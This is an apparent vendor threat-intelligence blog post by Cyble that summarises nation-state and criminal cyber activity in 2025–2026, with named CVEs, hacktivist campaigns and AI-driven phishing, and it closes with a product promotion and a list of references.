From 2025 to 2026, the global threat environment has produced several notable signals indicating how modern cyber conflict is evolving. Threat intelligence monitoring of underground forums revealed multiple offers of high-value system access throughout 2025. Examples include widely confirmed events, like on January 9, 2026, the cybercrime collective ShinyHunters published a manifesto alongside the leaked database of the BreachForums platform, exposing metadata for 323,986 users, including email addresses, hashed passwords, IP addresses, and registration details. Analysts believe some data may have been intentionally falsified for operational security.  Vulnerability exploitation also intensified. In February 2026, Microsoft patched six actively exploited zero-day vulnerabilities affecting components including SmartScreen, Windows Desktop Window Manager, and Remote Desktop Services. Soon afterward, the U.S. Cybersecurity and Infrastructure Security Agency added VMware Aria Operations vulnerability CVE-2026-22719 to its Known Exploited Vulnerabilities catalog due to confirmed exploitation in the wild.  By March 10, 2026, intelligence reporting warned of potential retaliatory cyber activity connected to escalating tensions involving Iran. Following the warning, cyber activity linked to the conflict increased across the Middle East. After the February 2026 U.S.–Israel strikes against Iranian targets, security researchers reported a surge of retaliatory cyber operations and hacktivist campaigns targeting organizations in Israel, the United States, and allied countries. Analysts tracked dozens of incidents ranging from distributed-denial-of-service attacks and website defacements to alleged data breaches claimed by pro-Iranian and pro-Palestinian hacker groups.  Several groups publicly promoted operations such as “#Op_Israel_USA,” claiming attacks against Israeli telecom services, government websites, and Western organizations. Hacktivist collectives, including Handala Hack and Dark Storm Team, used Telegram and underground forums to claim responsibility for disruptions and alleged system compromises. 

Decoding Nation-State Cyberattacks 

China-Linked Cyber Espionage Campaigns 

Strategic espionage still exists as one of the most consistent features of cyber espionage in 2026. National threat assessments highlight that state actors, including China, are almost certainly attempting to cause a disruptive effect and manipulate industrial control systems in support of broader strategic goals.  Government networks, research institutions, and emerging technology sectors remain priority targets. Telecommunications infrastructure has also become a major collection point because it offers both intelligence visibility and operational leverage.  Threat intelligence summaries from the telecom sector, specifically, from Cyble’s Telecommunications Sector Threat Landscape Report 2025, documented 444 security incidents and 90 ransomware attacks against telecom companies in 2025 alone. The concentration of activity reinforces telecom networks as a strategic surveillance layer for nation-state cyberattacks. 

Russia-Linked Operations and Military Intelligence Campaigns 

Russian cyber operations have remained closely tied to geopolitical conflict, particularly in Europe and regions affected by the war in Ukraine. Security research identified activity consistent with the Russian threat group APT28 targeting government and military entities using a Microsoft Office vulnerability, CVE-2026-21509. The campaign reportedly involved a multi-stage attack chain designed to remain stealthy during post-exploitation phases.  Another example involved attackers weaponizing a previously patched WinRAR vulnerability (CVE-2025-8088). Even after patches become available, such flaws frequently remain exploitable due to slow enterprise patch adoption, making them attractive tools in state-sponsored cyber threats. 

North Korea and Financially Motivated Cyber Operations 

North Korean cyber activity continues to blur the line between espionage and organized crime. One of the most widely reported examples involved the attribution of a $1.5 billion cryptocurrency theft from Bybit in February 2025 to the Lazarus Group.  Financial theft serves both economic and strategic purposes for the North Korean state. At the same time, identity-based fraud has become another operational method.  

The New Digital Battlefield 

Critical infrastructure still exists a primary target in cyber warfare 2026, with industrial control systems (ICS) and operational technology networks at high risk of manipulation by state actors to disrupt public administration, utilities, and transportation systems.   While detailed technical disclosures of confirmed sabotage are limited, attackers increasingly focus on cloud and identity systems, exploiting stolen credentials, authentication tokens, and legitimate administrative tools to move laterally and gain broad access.   Supply chains further amplify systemic risk, as compromises of third-party vendors can cascade across multiple organizations, making supply-chain attacks an efficient vector for nation-state cyberattacks, particularly against critical infrastructure and government networks. 

AI and the Evolution of Cyber Operations 

Artificial intelligence is reshaping the cyber threat landscape, although its direct role in confirmed state operations remains difficult to measure.  Threat intelligence monitoring shows the rise of Deepfake-as-a-Service markets and advertisements offering identity verification bypass tools or synthetic video generation. In 2025, deepfakes were involved in more than 30 percent of high-impact corporate impersonation attacks.  Phishing campaigns are also becoming more automated. The CCAPAC Annual Report 2025 indicates that 82.6 percent of phishing emails now contain AI-generated elements, enabling attackers to scale highly convincing impersonation attempts.  Malware development may also be changing. Security researchers have reported experimental malware families capable of modifying behavior during attacks using language-model-based components. While technical documentation remains limited, such developments hint at how automation could shape future cyber warfare 2026 strategies.  Another area of rapid change is vulnerability discovery. AI-assisted code analysis has already demonstrated the ability to locate hundreds of severe software vulnerabilities in open-source projects within short timeframes, accelerating both defensive research and offensive exploitation. 

The Vulnerability Landscape Driving Modern Cyber Conflict 

Software vulnerabilities remain one of the most reliable entry points for attackers.  Examples from 2026 include: 

• CVE-2026-24423, a remote code execution vulnerability in SmarterMail exploited in ransomware campaigns. 
• CVE-2026-22719, a VMware Aria Operations command-injection flaw actively exploited in the wild. 
• CVE-2026-2441, the first actively exploited Chrome zero-day reported in 2026. 

Security researchers documented 90 zero-day vulnerabilities exploited in 2025, nearly half of which targeted enterprise technology systems. The pace of discovery continues to accelerate. One vulnerability monitoring report tracked 1,782 vulnerabilities disclosed in a single week, including 282 public proof-of-concept exploits. This quick weaponization cycle increases geopolitical cyber risk, as attackers can quickly convert newly discovered flaws into operational tools. 

Conclusion 

In 2026, digital conflict is a permanent part of global competition, with state-sponsored cyber threats exploiting supply chains, identity systems, and critical infrastructure to expand geopolitical risk. Criminal ecosystems further blur espionage and financially motivated attacks, complicating attribution. Cyble delivers AI-powered threat intelligence and autonomous defense through platforms like Cyble Blaze AI, giving organizations real-time visibility, automated protection, and proactive mitigation. Book a personalized demo today to stay protected from modern cyber threats. 

References: 

• https://cybersecuritynews.com/breachforums-hack/ 
• https://thecyberexpress.com/microsoft-patch-tuesday-february-2026/ 
• https://nvd.nist.gov/vuln/detail/CVE-2026-22719 
• https://abc17news.com/politics/national-politics/cnn-us-politics/2026/03/10/us-intelligence-community-ramps-up-warnings-of-possible-retaliatory-attacks-by-iran/ 
• https://industrialcyber.co/reports/cyber-retaliation-surges-after-us-israel-strikes-on-iran-as-hacktivists-hit-governments-defense-critical-sectors/ 
• https://www.intel471.com/blog/israeli-us-strikes-against-iran-triggers-a-surge-in-hacktivist-activity 
• https://cyble.com/resources/research-reports/telecommunications-sector-threat-landscape-report-2025/ 
• https://www.helpnetsecurity.com/2026/02/03/russian-hackers-are-exploiting-recently-patched-microsoft-office-vulnerability-cve-2026-21509/ 
• https://www.thaicert.or.th/en/2026/01/29/winrar-vulnerability-cve-2025-8088-continues-to-be-actively-exploited-by-hackers/ 
• https://www.theguardian.com/world/2025/feb/27/north-korea-bybit-crypto-exchange-hack-fbi 
• https://ccapac.asia/wp-content/uploads/2025/10/CCAPAC_AnnualReport2025_AIcybersecTrendsThreatsSolutions.pdf 
• https://www.cybersecuritydive.com/news/half-exploited-zero-day-flaws-enterprise-grade-technology/814021/